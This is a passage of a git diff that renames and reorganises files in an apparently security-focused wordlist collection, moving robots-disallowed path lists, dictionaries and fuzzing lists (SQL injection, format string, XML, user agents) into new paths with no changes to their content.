rename to Discovery/Web_Content/RobotsDisallowed-Top10.txt
diff --git a/Discovery/Web_Content/Top100-RobotsDisallowed.txt b/Discovery/Web_Content/RobotsDisallowed-Top100.txt
similarity index 100%
rename from Discovery/Web_Content/Top100-RobotsDisallowed.txt
rename to Discovery/Web_Content/RobotsDisallowed-Top100.txt
diff --git a/Discovery/Web_Content/Top1000-RobotsDisallowed.txt b/Discovery/Web_Content/RobotsDisallowed-Top1000.txt
similarity index 100%
rename from Discovery/Web_Content/Top1000-RobotsDisallowed.txt
rename to Discovery/Web_Content/RobotsDisallowed-Top1000.txt
diff --git a/Discovery/Web_Content/Top500-RobotsDisallowed.txt b/Discovery/Web_Content/RobotsDisallowed-Top500.txt
similarity index 100%
rename from Discovery/Web_Content/Top500-RobotsDisallowed.txt
rename to Discovery/Web_Content/RobotsDisallowed-Top500.txt
diff --git a/Discovery/Web_Content/french.txt b/Discovery/Web_Content/common_and_french_dictionary.txt
similarity index 100%
rename from Discovery/Web_Content/french.txt
rename to Discovery/Web_Content/common_and_french_dictionary.txt
diff --git a/Discovery/Web_Content/big_portuguese-dictionary.txt b/Discovery/Web_Content/common_and_portuguese_dictionary.txt
similarity index 100%
rename from Discovery/Web_Content/big_portuguese-dictionary.txt
rename to Discovery/Web_Content/common_and_portuguese_dictionary.txt
diff --git a/Fuzzing/Generic_SQLi b/Fuzzing/Generic_SQLi.txt
similarity index 100%
rename from Fuzzing/Generic_SQLi
rename to Fuzzing/Generic_SQLi.txt
diff --git a/Fuzzing/JHADDIX_FORMATSTRING b/Fuzzing/JHADDIX_FORMATSTRING.txt
similarity index 100%
rename from Fuzzing/JHADDIX_FORMATSTRING
rename to Fuzzing/JHADDIX_FORMATSTRING.txt
diff --git a/Discovery/Web_Content/UserAgents.fuzz.txt b/Fuzzing/UserAgents.fuzz.txt
similarity index 100%
rename from Discovery/Web_Content/UserAgents.fuzz.txt
rename to Fuzzing/UserAgents.fuzz.txt
diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ.txt
similarity index 100%
rename from Fuzzing/XML_FUZZ
rename to Fuzzing/XML_FUZZ.txt